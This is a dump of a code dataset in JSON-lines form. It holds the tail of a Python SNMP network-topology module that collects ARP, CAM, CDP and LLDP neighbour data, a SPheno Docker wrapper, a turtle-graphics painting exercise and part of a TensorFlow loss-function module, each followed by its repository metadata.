'1.3.6.1.2.1.3.1.1.2.121.1.10.0.127.1': '0x88908d1b17d2',\n '1.3.6.1.2.1.3.1.1.2.122.1.10.0.128.1': '0x88908d1b17de',\n '1.3.6.1.2.1.3.1.1.2.123.1.10.0.129.1': '0x88908d1b17c8',\n '1.3.6.1.2.1.3.1.1.2.124.1.10.0.130.1': '0x88908d1b17fe'}\n \"\"\"\n _arp_oid = '1.3.6.1.2.1.3.1.1.2'\n arps = []\n arp_table = self.snmp_get(_arp_oid, is_bulk=True)\n for oid, val in arp_table.table.items():\n oid_end = oid.split(f\"{_arp_oid}.\")[1]\n end_list = oid_end.split('.')\n idx = end_list.pop(0)\n _ = end_list.pop(0)\n ip = '.'.join(end_list)\n interface = self.get_ifname_index(int(idx))\n mac = mac_hex_to_ascii(val)\n arps.append(ARPData(ip, mac, interface))\n return arps\n\n def get_macs_for_vlan(self, vlan: int) -> List[MACData]:\n ''' MAC addresses for a single VLAN\n _stp = '1.3.6.1.2.1.17.2.15.1'\n _stp_port = f'{_stp}.1'\n _stp_priority = f'{_stp}.2'\n _stp_state = f'{_stp}.3'\n _mac = '1.3.6.1.2.1.4.22.1'\n _mac_vlan = '1.3.6.1.2.1.4.22.1.1'\n _mac_mac = '1.3.6.1.2.1.4.22.1.2'\n _mac_ip = '1.3.6.1.2.1.4.22.1.3'\n _mac_type_map = '1.3.6.1.2.1.4.22.1.4'\n '''\n _cam = '1.3.6.1.2.1.17.4.3.1'\n _bridge_mac = '1.3.6.1.2.1.17.4.3.1.1'\n _bridge_port = '1.3.6.1.2.1.17.4.3.1.2'\n _bridge_stat = '1.3.6.1.2.1.17.4.3.1.3'\n _bridge_if = '1.3.6.1.2.1.17.1.4.1.2'\n macs = []\n # Get the dynamic CAM table for this VLAN\n cam_table = self.snmp_get(_cam, is_bulk=True, vlan=vlan)\n if not cam_table.table:\n return macs\n ifindex_table = self.snmp_get(_bridge_if, is_bulk=True, vlan=vlan)\n for oid, val in cam_table.search(_bridge_mac).items():\n idx = oid.split(f\"{_bridge_mac}.\")[1]\n index_cam = cam_table.index_table(idx)\n mac = mac_hex_to_ascii(val)\n portnum = index_cam.get(f\"{_bridge_port}.{idx}\")\n status_num = index_cam.get(f\"{_bridge_stat}.{idx}\")\n status = bridge_status_map.get(status_num)\n if portnum == '0':\n port = 'NotLearned'\n else:\n ifidx = ifindex_table.search(\n f\"{_bridge_if}.{portnum}\",\n return_type='val',\n )[0]\n port = self.get_ifname_index(int(ifidx))\n entry = MACData(vlan, mac, port, status)\n macs.append(entry)\n return macs\n\n def get_cam(self) -> List[MACData]:\n ''' MAC address table from this node\n '''\n mac_table = []\n # Grab CAM table for each VLAN\n for vlan in self.vlans:\n macs = self.get_macs_for_vlan(vlan.vid)\n if macs:\n mac_table.extend(macs)\n return mac_table\n\n def get_link(self, ifidx: int, link: LinkData=None) -> LinkData:\n if not link:\n link = LinkData()\n link.discovered_proto = 'Unknown'\n if not link.local_interface:\n if link.local_port:\n # Check local interfaces for name\n interface = self.find_interface(link.local_port, 'name')\n else:\n # Check local interfaces for index\n interface = self.find_interface(ifidx, 'idx')\n if interface:\n link.add_local_interface(interface)\n if not link.local_port:\n local_port = self.get_ifname_index(ifidx)\n if local_port:\n link.local_port = local_port\n link_type = self.snmp_get(f\"{o.TRUNK_VTP}.{ifidx}\")\n if self._has_value(link_type):\n if link_type.value == '2':\n link.link_type = 'trunk'\n elif link_type.value == '1':\n link.link_type = 'access'\n else:\n link.link_type = 'unknown'\n # trunk\n if link.link_type == 'trunk':\n native_vlan = self.snmp_get(f\"{o.TRUNK_NATIVE}.{ifidx}\")\n if self._has_value(native_vlan):\n link.local_native_vlan = native_vlan.value\n trunk_allowed = self.snmp_get(f\"{o.TRUNK_ALLOW}.{ifidx}\")\n if self._has_value(trunk_allowed):\n link.local_allowed_vlans = parse_allowed_vlans(trunk_allowed.value)\n # LAG membership\n lag = self.snmp_get(f\"{o.LAG_LACP}.{ifidx}\")\n if self._has_value(lag):\n interface = self.find_interface(int(lag.value), 'idx')\n if interface:\n link.local_lag = interface.name\n link.local_lag_ips = interface.cidrs\n link.remote_lag_ips = []\n # VLAN info\n vlan = self.snmp_get(f\"{o.IF_VLAN}.{ifidx}\")\n if self._has_value(vlan):\n link.vlan = vlan.value\n return link\n\n def get_cdp(self) -> List[LinkData]:\n \"\"\" Get a list of CDP neighbors.\n Returns a list of LinkData's.\n Will always return an array.\n # CDP (BULK)\n CDP: str = '1.3.6.1.4.1.9.9.23.1.2.1.1'\n CDP_IPADDR: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.4'\n CDP_IOS: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.5'\n # CDP_DEVID + .ifidx.53\n CDP_DEVID: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.6'\n CDP_DEVPORT: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.7'\n CDP_DEVPLAT: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.8'\n # CDP_INT 6.ifidx\n CDP_INT: str = '1.3.6.1.4.1.9.9.23.1.1.1.1.'\n \"\"\"\n _cdp_mib = '1.3.6.1.4.1.9.9.23.1'\n _cdp_ipaddr = '1.3.6.1.4.1.9.9.23.1.2.1.1.4'\n _cdp_ios = '1.3.6.1.4.1.9.9.23.1.2.1.1.5'\n _cdp_devname = '1.3.6.1.4.1.9.9.23.1.2.1.1.6'\n _cdp_devport = '1.3.6.1.4.1.9.9.23.1.2.1.1.7'\n _cdp_devplat = '1.3.6.1.4.1.9.9.23.1.2.1.1.8'\n # CDP_INT 6.ifidx\n _cdp_int = '1.3.6.1.4.1.9.9.23.1.1.1.1.'\n # get list of CDP neighbors\n neighbors = []\n cdp = self.snmp_get(_cdp_mib, is_bulk=True)\n # process only if this row is a _cdp_devname\n for oid, name in cdp.search(_cdp_devname).items():\n link = LinkData()\n link.discovered_proto = 'cdp'\n link.remote_name = normalize_host(\n name,\n self.snmp.config.host_domains,\n )\n idx1 = get_oid_index(oid, 14)\n idx2 = get_oid_index(oid, 15)\n idx = \".\".join([str(idx1), str(idx2)])\n link = self.get_link(idx1, link)\n index_cdp = cdp.index_table(idx)\n # get remote IP\n rip = index_cdp.get(f\"{_cdp_ipaddr}.{idx}\")\n link.remote_ip = ip_2_str(rip)\n # Lookup MAC with IP from arp_table\n if link.remote_ip:\n for arp in self.arp_table:\n if link.remote_ip == arp.ip:\n link.remote_mac = arp.mac\n # get remote port\n rport = index_cdp.get(f\"{_cdp_devport}.{idx}\")\n link.remote_port = normalize_port(rport)\n # get remote platform\n remote_plat = index_cdp.get(f\"{_cdp_devplat}.{idx}\")\n link.remote_plat = remote_plat\n # get IOS version\n rios_bytes = index_cdp.get(f\"{_cdp_ios}.{idx}\")\n link = self._link_ios(rios_bytes, link)\n neighbors.append(link)\n return neighbors\n\n def get_lldp(self) -> List[LinkData]:\n \"\"\" Get a list of LLDP neighbors.\n Returns a list of LinkData's\n Will always return an array.\n NEW_LLDP_MIB: str = '1.0.8802.1.1.2'\n LLDP: str = '1.0.8802.1.1.2.1.4'\n LLDP_TYPE: str = '1.0.8802.1.1.2.1.4.1.1.6.0'\n LLDP_DEVID: str = '1.0.8802.1.1.2.1.4.1.1.5.0'\n LLDP_DEVPORT: str = '1.0.8802.1.1.2.1.4.1.1.7.0'\n LLDP_DEVPDSC: str = '1.0.8802.1.1.2.1.4.1.1.8.0'\n LLDP_DEVNAME: str = '1.0.8802.1.1.2.1.4.1.1.9.0'\n LLDP_DEVDESC: str = '1.0.8802.1.1.2.1.4.1.1.10.0'\n LLDP_DEVADDR: str = '1.0.8802.1.1.2.1.4.2.1.5.0'\n \"\"\"\n _lldp_mib = '1.0.8802.1.1.2'\n _lldp_devaddr = '1.0.8802.1.1.2.1.4.2.1.5.0'\n _lldp_devid = '1.0.8802.1.1.2.1.4.1.1.5.0'\n _lldp_devport = '1.0.8802.1.1.2.1.4.1.1.7.0'\n _lldp_devpdsc = '1.0.8802.1.1.2.1.4.1.1.8.0'\n _lldp_port_name = '1.0.8802.1.1.2.1.3.7.1.4'\n _lldp_remote_descr = '1.0.8802.1.1.2.1.4.1.1.10.0'\n _lldp_remote_name = '1.0.8802.1.1.2.1.4.1.1.9.0'\n neighbors = []\n lldp = self.snmp_get(_lldp_mib, is_bulk=True)\n lld_dev_names = lldp.search(_lldp_remote_name)\n for oid, name in lld_dev_names.items():\n link = LinkData()\n link.discovered_proto = 'lldp'\n link.remote_name = normalize_host(\n name,\n self.snmp.config.host_domains,\n )\n idx1 = get_oid_index(oid, -2)\n idx2 = get_oid_index(oid, -1)\n idx = \".\".join(oid.split('.')[-2:])\n lldp_port = lldp.table.get(f\"{_lldp_port_name}.{idx1}\")\n link.local_port = normalize_port(lldp_port)\n link = self.get_link(idx1, link)\n rip_oid = f\"{_lldp_devaddr}.{idx}\"\n link.remote_ip = self.get_cidr_from_oid(rip_oid)\n # Lookup MAC with IP from arp_table\n for arp in self.arp_table:\n if arp.ip == link.remote_ip:\n link.remote_mac = arp.mac\n rport = lldp.table.get(f\"{_lldp_devport}.{idx}\")\n link.remote_port = normalize_port(rport)\n link.remote_port_desc = lldp.table.get(f\"{_lldp_devpdsc}.{idx}\")\n # devid = lldp.table.get(f\"{_lldp_devid}.{idx}\")\n # link.remote_mac = mac_hex_to_ascii(devid)\n rios_bytes = lldp.table.get(f\"{_lldp_remote_descr}.{idx}\")\n link = self._link_ios(rios_bytes, link)\n neighbors.append(link)\n return neighbors\n\n\"\"\" SNMP Queries Saved\nospf = self.snmp_get(o.OSPF)\nospf_id = self.snmp_get(o.OSPF_ID)\n\nent_class = self.snmp_get(o.ENTPHYENTRY_CLASS, is_bulk=True)\nent_serial = self.snmp_get(o.ENTPHYENTRY_SERIAL, is_bulk=True)\nent_plat = self.snmp_get(o.ENTPHYENTRY_PLAT, is_bulk=True)\nent_ios = self.snmp_get(o.ENTPHYENTRY_SOFTWARE, is_bulk=True)\nlink_type = self.snmp_get(o.TRUNK_VTP, is_bulk=True)\nlag = self.snmp_get(o.LAG_LACP, is_bulk=True)\nifname = self.snmp_get(o.IFNAME, is_bulk=True)\nifip = self.snmp_get(o.IF_IP, is_bulk=True)\nethif = self.snmp_get(o.ETH_IF, is_bulk=True)\ntrunk_allowed = self.snmp_get(o.TRUNK_ALLOW, is_bulk=True)\ntrunk_native = self.snmp_get(o.TRUNK_NATIVE, is_bulk=True)\nportnums = self.snmp_get(o.BRIDGE_PORTNUMS, is_bulk=True)\nifindex = self.snmp_get(o.IFINDEX, is_bulk=True)\nvlan = self.snmp_get(o.VLANS, is_bulk=True)\nvlandesc = self.snmp_get(o.VLAN_DESC, is_bulk=True)\nsvi = self.snmp_get(o.SVI_VLANIF, is_bulk=True)\nvpc = self.snmp_get(o.VPC_PEERLINK_IF, is_bulk=True)\nstack = self.snmp_get(o.STACK, is_bulk=True)\ncdp = self.snmp_get(o.CDP, is_bulk=True)\nlldp = self.snmp_get(o.LLDP, is_bulk=True)\nroute = self.snmp_get(o.IP_ROUTE_TABLE, is_bulk=True)\narp = self.snmp_get(o.ARP, is_bulk=True)\ncam = self.snmp_get(o.VLAN_CAM, is_bulk=True)\n\nbulk_shit = {\n 'ent_class': o.ENTPHYENTRY_CLASS,\n 'ent_serial': o.ENTPHYENTRY_SERIAL,\n 'ent_plat': o.ENTPHYENTRY_PLAT,\n 'ent_ios': o.ENTPHYENTRY_SOFTWARE,\n 'link_type': o.TRUNK_VTP,\n 'lag': o.LAG_LACP,\n 'ifname': o.IFNAME,\n 'ifip': o.IF_IP,\n 'ethif': o.ETH_IF,\n 'trunk_allowed': o.TRUNK_ALLOW,\n 'trunk_native': o.TRUNK_NATIVE,\n 'portnums': o.BRIDGE_PORTNUMS,\n 'ifindex': o.IFINDEX,\n 'vlan': o.VLANS,\n 'vlandesc': o.VLAN_DESC,\n 'svi': o.SVI_VLANIF,\n 'vpc': o.VPC_PEERLINK_IF,\n 'stack': o.STACK,\n 'cdp': o.CDP,\n 'lldp': o.LLDP,\n 'route': o.IP_ROUTE_TABLE,\n 'arp': o.ARP,\n 'cam': o.VLAN_CAM,\n}\n\"\"\"\n", "repo_name": "rlaneyjr/nettopo", "sub_path": "nettopo/core/node.py", "file_name": "node.py", "file_ext": "py", "file_size_in_byte": 35606, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Union", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 75, "usage_type": "name"}, {"api_name": "pysnmp.smi.rfc1902.ObjectIdentity", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 78, "usage_type": "name"}, {"api_name": "nettopo.core.data.EntData", "line_number": 78, "usage_type": "name"}, {"api_name": "nettopo.oids.Oids", "line_number": 81, "usage_type": "call"}, {"api_name": "nettopo.oids.GeneralOids", "line_number": 82, "usage_type": "call"}, {"api_name": "nettopo.oids.CiscoOids", "line_number": 83, "usage_type": "call"}, {"api_name": "alive_progress.config_handler.set_global", "line_number": 85, "usage_type": "call"}, {"api_name": "alive_progress.config_handler", "line_number": 85, "usage_type": "name"}, {"api_name": "nettopo.core.data.BaseData", "line_number": 88, "usage_type": "name"}, {"api_name": "nettopo.core.snmp.SNMP", "line_number": 91, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 129, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 138, "usage_type": "name"}, {"api_name": "binascii.unhexlify", "line_number": 141, "usage_type": "call"}, {"api_name": "sysdescrparser.sysdescrparser", "line_number": 148, "usage_type": "call"}, {"api_name": "nettopo.core.util.format_ios_ver", "line_number": 155, "usage_type": "call"}, {"api_name": "nettopo.core.exceptions.NettopoSNMPError", "line_number": 164, "usage_type": "call"}, {"api_name": "alive_progress.alive_bar", "line_number": 192, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_host", "line_number": 196, "usage_type": "call"}, {"api_name": "sysdescrparser.sysdescrparser", "line_number": 205, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 297, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 297, "usage_type": "name"}, {"api_name": "nettopo.core.data.InterfaceData", "line_number": 315, "usage_type": "name"}, {"api_name": "nettopo.core.util.is_ipv4_address", "line_number": 327, "usage_type": "call"}, {"api_name": "nettopo.core.util.bits_from_mask", "line_number": 330, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 344, "usage_type": "call"}, {"api_name": "nettopo.core.util.is_ipv4_address", "line_number": 374, "usage_type": "call"}, {"api_name": "nettopo.core.util.bits_from_mask", "line_number": 378, "usage_type": "call"}, {"api_name": "nettopo.core.util.mac_hex_to_ascii", "line_number": 434, "usage_type": "call"}, {"api_name": "nettopo.core.data.InterfaceData", "line_number": 440, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 442, "usage_type": "call"}, {"api_name": "nettopo.core.constants.int_type_map.get", "line_number": 446, "usage_type": "call"}, {"api_name": "nettopo.core.constants.int_type_map", "line_number": 446, "usage_type": "name"}, {"api_name": "nettopo.core.constants.int_admin_status_map.get", "line_number": 448, "usage_type": "call"}, {"api_name": "nettopo.core.constants.int_admin_status_map", "line_number": 448, "usage_type": "name"}, {"api_name": "nettopo.core.constants.int_oper_status_map.get", "line_number": 450, "usage_type": "call"}, {"api_name": "nettopo.core.constants.int_oper_status_map", "line_number": 450, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 384, "usage_type": "name"}, {"api_name": "nettopo.core.data.InterfaceData", "line_number": 384, "usage_type": "name"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 475, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 484, "usage_type": "call"}, {"api_name": "nettopo.core.util.format_ios_ver", "line_number": 489, "usage_type": "call"}, {"api_name": "nettopo.core.data.EntData", "line_number": 491, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 504, "usage_type": "name"}, {"api_name": "nettopo.core.data.InterfaceData", "line_number": 504, "usage_type": "name"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 512, "usage_type": "call"}, {"api_name": "nettopo.core.data.SVIData", "line_number": 513, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 508, "usage_type": "name"}, {"api_name": "nettopo.core.data.SVIData", "line_number": 508, "usage_type": "name"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 525, "usage_type": "call"}, {"api_name": "nettopo.core.constants.RESERVED_VLANS", "line_number": 526, "usage_type": "name"}, {"api_name": "nettopo.core.data.VLANData", "line_number": 527, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 520, "usage_type": "name"}, {"api_name": "nettopo.core.data.VLANData", "line_number": 520, "usage_type": "name"}, {"api_name": "nettopo.core.data.StackData", "line_number": 532, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 536, "usage_type": "call"}, {"api_name": "nettopo.core.data.StackMemberData", "line_number": 537, "usage_type": "call"}, {"api_name": "nettopo.core.util.mac_hex_to_ascii", "line_number": 549, "usage_type": "call"}, {"api_name": "nettopo.core.data.StackData", "line_number": 530, "usage_type": "name"}, {"api_name": "nettopo.core.data.VssData", "line_number": 562, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 570, "usage_type": "call"}, {"api_name": "nettopo.core.data.VssMemberData", "line_number": 574, "usage_type": "call"}, {"api_name": "nettopo.core.data.VssData", "line_number": 556, "usage_type": "name"}, {"api_name": "nettopo.core.data.VPCData", "line_number": 591, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 592, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 584, "usage_type": "name"}, {"api_name": "nettopo.core.data.VPCData", "line_number": 584, "usage_type": "name"}, {"api_name": "nettopo.core.util.mac_hex_to_ascii", "line_number": 651, "usage_type": "call"}, {"api_name": "nettopo.core.data.ARPData", "line_number": 652, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 596, "usage_type": "name"}, {"api_name": "nettopo.core.data.ARPData", "line_number": 596, "usage_type": "name"}, {"api_name": "nettopo.core.util.mac_hex_to_ascii", "line_number": 681, "usage_type": "call"}, {"api_name": "nettopo.core.constants.bridge_status_map.get", "line_number": 684, "usage_type": "call"}, {"api_name": "nettopo.core.constants.bridge_status_map", "line_number": 684, "usage_type": "name"}, {"api_name": "nettopo.core.data.MACData", "line_number": 693, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 655, "usage_type": "name"}, {"api_name": "nettopo.core.data.MACData", "line_number": 655, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 697, "usage_type": "name"}, {"api_name": "nettopo.core.data.MACData", "line_number": 697, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 708, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 710, "usage_type": "call"}, {"api_name": "nettopo.core.util.parse_allowed_vlans", "line_number": 740, "usage_type": "call"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 783, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_host", "line_number": 785, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 789, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 790, "usage_type": "call"}, {"api_name": "nettopo.core.util.ip_2_str", "line_number": 796, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 804, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 755, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 755, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 840, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_host", "line_number": 842, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 846, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 847, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 850, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 859, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 814, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 814, "usage_type": "name"}]} +{"seq_id": "24026535308", "text": "import argparse, subprocess, traceback, sys, json, textwrap\nfrom shutil import copyfile\n\ndef main():\n args = parse_arg()\n\n slha_in = sys.stdin.readlines()\n slha_out = spheno(slha_in)\n\n print(''.join(slha_out))\n\n\ndef spheno(slha):\n workdir = '/spheno/'\n spheno = workdir + 'bin/SPheno'\n\n spheno_in = workdir + 'LesHouches.in'\n spheno_out = workdir + 'SPheno.spc'\n\n with open(spheno_in, 'w') as f:\n f.write(''.join(slha))\n\n command = [spheno, spheno_in]\n\n try:\n o = subprocess.check_output(command, stderr=subprocess.STDOUT, cwd=workdir)\n except subprocess.CalledProcessError as e:\n raise Exception('spheno: ' + str(e) + ':\\n' + e.output)\n\n with open(spheno_out, 'r') as f:\n slha_out = f.readlines()\n\n return slha_out\n\n\ndef parse_arg():\n a = argparse.ArgumentParser(prog='spheno',\n description=textwrap.dedent('''\\\n Dockerized version of SPheno SUSY spectrum calculator.\n\n Takes SLHA file as input and writes SLHA to output.\n '''),\n formatter_class=argparse.RawTextHelpFormatter)\n\n args = a.parse_args()\n return vars(args)\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "sliem/docker-hep", "sub_path": "spheno/interface.py", "file_name": "interface.py", "file_ext": "py", "file_size_in_byte": 1303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdin.readlines", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 26, "usage_type": "call"}, {"api_name": "subprocess.STDOUT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 27, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 37, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 38, "usage_type": "call"}, {"api_name": "argparse.RawTextHelpFormatter", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "29426465342", "text": "###This code will not work in repl.it as there is no access to the colorgram package here.###\n##We talk about this in the video tutorials##\nimport colorgram\nfrom random import choice\nfrom turtle import Turtle, Screen\n\n# import colorgram\n#\n# # Extract 6 colors from an image.\n# colors = colorgram.extract('sweet_pic.jpg', 6)\n#\n# # colorgram.extract returns Color objects, which let you access\n# # RGB, HSL, and what proportion of the image was that color.\n# first_color = colors[0]\n# rgb = first_color.rgb # e.g. (255, 151, 210)\n# hsl = first_color.hsl # e.g. (230, 255, 203)\n# proportion = first_color.proportion # e.g. 0.34\n#\n# # RGB and HSL are named tuples, so values can be accessed as properties.\n# # These all work just as well:\n# red = rgb[0]\n# red = rgb.r\n# saturation = hsl[1]\n# saturation = hsl.s\n\nrgb_colors = []\ncolors = colorgram.extract('image.jpg', 50)\n\nfor color in colors:\n new_color = (color.rgb[0:])\n rgb_colors.append(new_color)\n\nsdet_soloman = Turtle('turtle')\nsdet_soloman.speed(4)\nsdet_soloman.penup()\nsdet_soloman.setposition(-340, -300)\nsdet_soloman.shapesize(2)\n\nscreen = Screen()\nscreen.colormode(255)\n\nfor char in range(0, 13):\n\n for num in range(0, 12):\n sdet_soloman.color(choice(rgb_colors))\n sdet_soloman.stamp()\n sdet_soloman.forward(60)\n\n sdet_soloman.setposition(-340, sdet_soloman.ycor() + 50)\n\n\n\nscreen.exitonclick()\n", "repo_name": "SDET-SOLOMAN/a_hundred_days_of_python", "sub_path": "day_16/hirst_paintin_turtle_images.py", "file_name": "hirst_paintin_turtle_images.py", "file_ext": "py", "file_size_in_byte": 1388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "colorgram.extract", "line_number": 27, "usage_type": "call"}, {"api_name": "turtle.Turtle", "line_number": 33, "usage_type": "call"}, {"api_name": "turtle.Screen", "line_number": 39, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "26073601004", "text": "from functools import partial\nfrom core_tools import ops as K\nimport tensorflow as tf\nfrom tensorflow.keras.losses import SparseCategoricalCrossentropy, BinaryCrossentropy, binary_crossentropy, \\\n kl_divergence\n\nBinaryCrossEntropy = partial(BinaryCrossentropy, from_logits=True)\nCrossEntropy = partial(SparseCategoricalCrossentropy, from_logits=True)\nbinary_cross_entropy = partial(binary_crossentropy, from_logits=True)\n\n\ndef kl_div(y_true, y_pred, from_logits=True, sparse=True, sigmoid=\"auto\", expand_sigmoid=True):\n if sigmoid == \"auto\":\n sigmoid = True if y_pred.shape[-1] == 1 else False\n if from_logits:\n if sigmoid:\n y_pred = tf.nn.sigmoid(y_pred)\n else:\n y_pred = tf.nn.softmax(y_pred)\n if sparse == \"logits\":\n if sigmoid:\n y_true = tf.nn.sigmoid(y_true)\n else:\n y_true = tf.nn.softmax(y_true)\n elif sparse:\n # Older TensorFlow version do not support int8 in one-hot.\n y_true = tf.one_hot(K.uint(y_true), depth=y_pred.shape[-1])\n if sigmoid is True and expand_sigmoid:\n y_pred = tf.concat([1 - y_pred, y_pred], axis=-1)\n y_true = tf.concat([1 - y_true, y_true], axis=-1)\n # print(f\"kl - {y_true} {y_pred}\")\n result = kl_divergence(y_true, y_pred)\n if sigmoid is True:\n result = result[..., None]\n return result\n\n\ndef symmetrical_divergence(y_true, y_pred, *args, fn=kl_div, **kwargs):\n return (fn(y_true, y_pred, *args, **kwargs) + fn(y_pred, y_true, *args, **kwargs)) / 2\n\n\nsym_div = symmetrical_divergence\n\n# jensen_shannon_divergence\n# probably works only for probabilities\ndef js_div(y_true, y_pred, from_logits=True, sparse=True, sigmoid=\"auto\", expand_sigmoid=True):\n return kl_div(y_true, (y_true + y_pred) / 2, from_logits=from_logits, sparse=sparse, sigmoid=sigmoid,\n expand_sigmoid=expand_sigmoid) + \\\n kl_div(y_pred, (y_true + y_pred) / 2, from_logits=from_logits,\n sparse=sparse, sigmoid=sigmoid, expand_sigmoid=expand_sigmoid) / 2\n\n\n# jensen_shannon_divergence 2\ndef js_div_2(y_true, y_pred, from_logits=True, sparse=True, sigmoid=\"auto\", expand_sigmoid=True):\n if sigmoid == \"auto\":\n sigmoid = True if y_pred.shape[-1] == 1 else False\n if from_logits:\n if sigmoid:\n y_pred = tf.nn.sigmoid(y_pred)\n else:\n y_pred = tf.nn.softmax(y_pred)\n if sparse == \"logits\":\n if sigmoid:\n y_true = tf.nn.sigmoid(y_true)\n else:\n y_true = tf.nn.softmax(y_true)\n elif sparse:\n # Older TensorFlow version do not support int8 in one-hot.\n y_true = tf.one_hot(K.uint(y_true), depth=y_pred.shape[-1])\n if sigmoid is True and expand_sigmoid:\n y_pred = tf.concat([1 - y_pred, y_pred], axis=-1)\n y_true = tf.concat([1 - y_true, y_true], axis=-1)\n # print(f\"kl - {y_true} {y_pred}\")\n result = kl_divergence(y_true, (y_true + y_pred) / 2) + kl_divergence(y_pred, (y_true + y_pred) / 2)\n if sigmoid is True:\n result = result[..., None]\n return result\n\n\ndef cross_entropy_with_logits(y_true, y_pred, axis=-1, true_from_logits=True, sigmoid=False):\n if true_from_logits:\n if sigmoid:\n y_true = tf.nn.sigmoid(y_true)\n else:\n y_true = tf.nn.softmax(y_true, axis=axis)\n # print(f\"cross_entropy - {y_true} {y_pred}\")\n if sigmoid:\n return tf.nn.sigmoid_cross_entropy_with_logits(y_true, y_pred)\n return tf.nn.softmax_cross_entropy_with_logits(y_true, y_pred, axis=axis)\n\n\ndef debug_(fn):\n def wrapper(y_true, y_pred):\n # print(f\"{fn} - {y_true} {y_pred}\")\n result = fn(y_true, y_pred)\n return result\n\n return wrapper\n\n# y_true.numpy().sum(1)\n# tf.nn.sigmoid(y_pred).numpy().sum(1)\n# y_true\n\n\n# def sigmoid_kl_divergence(y_true, y_pred):\n# return kl_divergence(y_true, tf.nn.sigmoid(y_pred))\n\n# y_pred.numpy()\n# y_true.numpy()\n# tf.nn.softmax(y_pred).numpy()\n# y_true.numpy()\n# tf.one_hot(y_true, depth=y_pred.shape[-1]).numpy()\n# kl_divergence(y_true, y_pred).numpy()\n# tf.concat([1 - y_true, y_true], axis=-1).numpy()\n", "repo_name": "jakubkwiatkowski/core_tools", "sub_path": "core_tools/loss.py", "file_name": "loss.py", "file_ext": "py", "file_size_in_byte": 4122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "functools.partial", "line_number": 7, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.BinaryCrossentropy", "line_number": 7, "usage_type": "argument"}, {"api_name": "functools.partial", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 8, "usage_type": "argument"}, {"api_name": "functools.partial", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.binary_crossentropy", "line_number": 9, "usage_type": "argument"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 19, 